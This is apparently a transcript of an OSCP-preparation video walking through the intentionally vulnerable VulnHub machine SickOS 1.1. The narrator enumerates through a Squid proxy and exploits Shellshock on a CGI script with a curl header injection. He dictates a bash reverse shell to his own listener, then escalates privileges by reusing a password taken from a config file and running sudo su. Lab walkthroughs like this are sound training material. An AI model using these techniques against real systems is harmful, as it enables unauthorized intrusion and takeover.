Hello hackers, and welcome to another OSCP preparation video. In this video we're going to go through SickOS, which is another vulnerable machine from vulnhub. So like I said in the previous video, no more Chioptrix machines because I'm tired of Chioptrix machines, and probably you are too as well. Alright, so a couple of pointers before we get into this machine. So SickOS, the initial entry point on this machine wasn't very straightforward to me, and I followed the first thing that came into my mind and went into a rabbit hole. And actually that was a really fun and engaging experience which led nowhere. And after that rabbit hole, I did a little bit more enumeration, and I investigated a certain service, and then went into the vector of attack that actually got me inside the machine. And once inside this machine, a privilege escalation was really simple. And I have a suspicion that there are more than one ways of doing privilege escalation on SickOS version 1.1, but I didn't look too much into that. Okay, so that being said, let's jump right into it. So first I'm gonna do a net discover, but before that let's see my IP. So my IP is on 0103. Then we're gonna do a net discover -i ETH0 for interface -r for range 192.168.0.0.24. Opening up another terminal over here. And we can see that Chioptrix. So SickOS is 0105. Alright, so let's do a simple nmap minus version. So we have -sv to check the versions of the services found on the ports that are open on this machine, 192.168.0.105. And this should finish like really quickly. That's what I always say. Okay, so as we can see, we have 22 open, so SSH. Then we have 3128 open, HTTP proxy squid, and 8080, which is closed, another HTTP proxy. So we have no port 80 opened. Okay, so let's go back to Firefox, and as you can see, I haven't told you, but you might have figured it out yourself. So these are my notes for this machine. This is my personal write-up for this machine, and we might look into this if we get stuck along the way, or if we need more pointers along the way. All right, so like I said, as we can see from this nmap scan, there is no port 80 open. We only have 3128, which nmap thinks is a squid HTTP proxy. So let's go to 192.168.0.105. Let's first do 80, just to make sure. So as you can see, there's nothing running on 80. 192.168.0.105 3218, and we can see that we have the default error message from squid. Okay, one thing that should come to your mind when you see a proxy server being or running on a server is that the traffic to the web 80, port 80 on that machine, the traffic might go through this proxy server. So this actually means, so whenever you have a proxy server running, you could think of it as a portal to your desired address. So all the traffic that would go to your port 80 first goes through this 3128 proxy. So it's like filtered, as I said. So with this in mind, we could, I mean, if you don't know about that, you should Google how proxy servers work, or how proxies work, or even more specifically for this situation, how squid proxy works. And you'll find a lot of useful information on Google. What is a squid proxy? What is squid proxy server? And read along and you'll better understand what a proxy does. So with this in mind, we could simply derb on HTTP 192.168.0.105.3.128, but I don't think this will lead us anywhere because we're just derbing the proxy server, so there's nothing on the proxy server. We wanna derb on the actual 80 port if there is a web server, if the web server running on this machine is on port 80, and we want to derb on that port, on port 80, by going through port 3128, so by using a proxy in our derb. Because let me just stop this because it won't lead anywhere. If we just derb HTTP 192.168.0.105, this isn't going to work. I don't think the derb is even gonna start. But if we derb using a proxy server, we might have something. So let's see. Let me just clear this. Let's see, derb grab proxy. So how we use derb with proxy? With the -p. And it also has the option of using password protected proxies. Okay, so the basic idea of what I'm gonna do is that we're actually going to investigate this machine SickOS. We're going to try to use this proxy as our way into getting the actual web server on port 80 on this machine. Okay, so hopefully that makes sense. So we're gonna use derb on HTTP 192.168.0.105 using the proxy 192.168.0.105.3.128. And let's see if this works. There you go. It starts getting results. So the idea of using the proxy seems to be working well, and we're gonna use the same logic in all the upcoming actions that we're doing. So let's also start a nicto -h192, but first let's see how nicto uses proxy. Nicto grab proxy, nicto help grab proxy. Let's see, nicto -- help grab proxy. Let's see, nicto -h option host requires an argument. Anyway, let's just nicto and see if we can find some proxy over here. Nicto -H grab proxy. Okay, so we have the option use proxy. Right, so derb finished, and we can see that we have some interesting things over here. We're gonna look into them after we start the nicto. So nicto -h 192.168.0.105, and let's use proxy equals 192.168.0.105.3.128. And nicto is running. All right, so going back to derb here, like I said, we want to use the same logic in our in the actions that we're gonna do. So we've seen another thing that we can do before we get into setting up the proxy for Firefox over here, we can simply curl. Let me open up another terminal. We can curl, let's see, curl -help grep proxy. I believe curl is -x for using proxy. Let's see. So yeah, curl -x. So let's curl with verbosity on HTTP 192.168. So see if we can access the port 80 on this machine by going through the proxy. So 0105 -x 192.168. Let's just use the same HTTP. 192.168.0.105.3128. And we can see that we have some content coming up using this curl with the proxy option. But if we do it without the proxy, it isn't able to actually show us any information or even connect to the server, because it only accepts connections through that proxy. All right, let's do the same thing on Firefox over here. So we're gonna go to the network proxy settings and do a manual proxy configuration using 192.168.0.105 port 3128. All right, and now let's go to 192.168.0.105, and we can now access port 80 on this web server by going through the proxy. Okay, so we have something from Derb over here. We have some information. We have CGI ban, so this is interesting. We're gonna look into it in a minute. We have the robots.txt, so let's see. Or robots. Let's see robots.txt. And it says disallow Wolf CMS. So let's see what's on Wolf CMS. So we have Wolf Content Management Simplified. So it's not system, but simplified. The very first thing that I'm doing when I see a CMS, I just go to Google Wolf CMS exploit. And I was telling you a minute ago, or in the beginning of this video, about rabbit holes. So this was the rabbit hole that I went in through. I tried exploiting these vulnerabilities manually. However, I believe this is authenticated. These exploits require users to be authenticated. I tried creating, in fact, I wasn't even able to get the administration panel on this, to get to the administration panel on this Wolf CMS until later, after rooting the machine. I looked into ways of going to the admin panel on Wolf CMS, and lo and behold, so if we do a little Google on Wolf CMS, let's say GitHub, we can find the full web directory structure of this Wolf CMS. And if we go to Wolf, we can see the different folders on the server. So doing the same thing over here, we look at Wolf. There's nothing in there, but so we don't have any error message. But if we go to, let's say, admin, we can see the folders inside the admin directory. So this was actually a rabbit hole that I got like stuck for, I don't know, maybe half an hour to an hour, until I decided to try to exploit the machine or try to get into the machine using a different route. Like I said, I later found out that the administration panel would be at $admin, let's see, or $login, or like this, $login or $admin. Yeah, so this is where the admin panel is, and of course, if you try admin, it might work. I think it works. Yeah. Okay, so this was not the intended way, this was not my intended way of getting into this machine. So what I did, let's just pin that, get out of these. Getting back to the Nikto, I looked at the information that Nikto provided for this machine. Nikto also found the robots.txt. We have another interesting, two interesting like directories and a file over here, connect and cgi.bin. We can also see a lot of interesting information from Nikto, but the most interesting is probably this one. Site appears to be vulnerable to the Shellshock vulnerability. Okay, so at this point I looked for, I knew that Shellshock is a very popular vulnerability from a couple of years ago. As you can see, this one is 2014. And if we look at CVE 2014-6271, we find out that this is a bash, the bash bug. If we look more into this, we can get the entire information as well as some potential exploits from ExploitDB. So to be very specific in this case, let's see CVE 2014, or let's see Shellshock bash bug manual exploit. I think this was what I looked for. Or Shellshock manual exploit. Let's see. Manually exploiting Shellshock vulnerability. I think this was the one that I looked into. So what this bash bug vulnerability is that it allows remote command execution on the machine through the CGI folder, through some CGI scripts, and in this case it's through CGI bin.status. So if let's just get out of derb, if we try to curl HTTP 192.168.0.105 CGI bin status, we can see that we have some information over here. Okay, so this is what we're actually going to try to get into the machine through this bug. So let's see what Garage4Hacker tells us. Manually exploiting Shellshock vulnerability, and we only need the exploit parameter. So we're going to modify, what we're going to do is we can either modify the user agent to exploit this vulnerability, and we can do that through curl, or I think through burp as well. I'm just going to prefer curl because it's like even more manually. And we can either modify the headers or the user agent. So I believe I went by using the headers, by modifying the headers, and we need to input, this is the actual vulnerability that allows us to do remote code execution. And I really encourage you to read through this material for better understanding how this vulnerability works. But I'm going to save some time over here. I'm going to save both you and I some time, and I'm just going to go to the actual curl command. So even further down, let's see. This is just pinging to see if the command works. And I believe this is the one. Okay, so at this point, when I was able to see that I got command execution, I tried opening up I tried sending myself a netcat shell, a netcat reverse shell using NC, but I wasn't able to do that. So I followed their suggestion on using the bash reverse shell. So you can look for reverse shell cheat sheet and explore different options that pentestmonkey.net gives you. So the bash one was the one that seemed to have worked. Alright, so let's now build this curl command to actually exploit this machine. So we have curl -v -x. So we're going through the proxy server and we're going to our machine, and so CGI bin, we should have left that over there, CGI bin status. Okay, and we have to specify custom headers. So user agent is gonna be this. Okay, now bin bash -i. So this is where we send our reverse shell. Let's open up a listener to 1234, but first let's check again for our IP 0103. So NC -LVP 1234. So we're listening on 1234. So -i greater than dev TCP 192.168.0.103 port 1234 0 greater than and 1. And if this is correct, we should get a reverse shell. Let's see. Okay, so we are inside ls-a. Alright, so who am I? Okay, so at this point we are inside the machine, so the next step is to actually do privilege escalation. So as I got inside the machine, I remembered about the Wolf CMS, and since I wasn't able to actually use it to get inside the machine, I thought of it, okay, so there are two options. It might have been just a rabbit hole, or it might have been something useful that would maybe allow us to allow us into the privilege escalation side of this machine. Okay, so I am data, and what I usually do when I get inside the machine in terms of privilege escalation is to look for different configuration files into different folders like etc or var then I also look for SUID and GUID files and try to see if I can get some sort of privilege escalation through that. What I also do is run scripts like lin-enum or linux priv check as an automated way of doing privilege escalation. And I also do some other manual stuff. But in this case, I looked to see what's the name of the user is SickOS, and then I remembered about the Wolf CMS thing, and I looked into var into the Wolf CMS folder, because I thought that maybe I would find something useful that would help me escalate my privileges at least to the SickOS user. So let's see, ls home, yeah, ls home, so the user is SickOS. The first file that caught my attention was the config.php, so I looked to see what it is all about, if there's some useful information inside. And this is a configuration file that gives us some database settings over here. We have the root and the password John at 123. So like I said, the privilege escalation for this machine was really simple. The first thing that I tried is to MySQL but I think we need a better shell. So Python -c import pty.spawn bin bash, okay, and then MySQL as root with the password John at 123, and we are inside MySQL. And over here I tried seeing if I am able to escalate my privileges using the user defined functions, which is a functionality that I showed you in a previous video, in a previous Chioptrix video. I think it's the third video in the Chioptrix machine series, so you might want to check that out if you're interested in learning how I was able to escalate my privileges using the MySQL UDF function. But in this case, let's get back to bash. In this case, I tried locating MySQL UDF, and there is no such thing. So we don't have the script, which got me thinking that we might not be able to escalate our privileges using MySQL UDF. Alright, so I remember that there's this user SickOS, and I thought of password reuse. I thought of actually trying the John at 123 password with I tried switching the user to SickOS using the John 123 password. So su SickOS John at 123, and lo and behold, I'm SickOS on this machine. And in this case, privilege escalation to root was really simple, because one of the first things that you should try on these vulnerable machines, this is more like sort of a CTF like scenario, because in real life it's not as common as it is in CTF scenarios. So sudo -l to check for commands that can be executed by SickOS with administrative or root privileges. So sudo -l and the password John at 123, and lo and behold, we can see that user SickOS may run the following commands. All of the commands can be run by SickOS with administrative privileges. So what's the first command that comes to your mind? I'm giving you 5 seconds. 3, 2, 1, and the command is sudo su. And there we have it. We are root. Let's go into root, ls-a, and read this, cat a0. You have successfully completed SickOS 1.1. Thanks for trying. Okay, so this was SickOS 1.1 in a nutshell. I believe there might have been more than one ways of getting into the machine, as well as more than one ways of doing privilege escalation, but I didn't actually take the time to investigate further, because I want to keep on moving forward without spending too much time on each individual machine. Alright, fellow hackers, so I hope you enjoyed this video, and I hope you've learned something useful along the way. If you enjoyed it, please make sure to like, subscribe, and share this video with anyone interested in cybersecurity penetration testing, OSCP training, and offensive security. With that being said, thank you so much for watching this video, and I look forward to seeing you in the next one.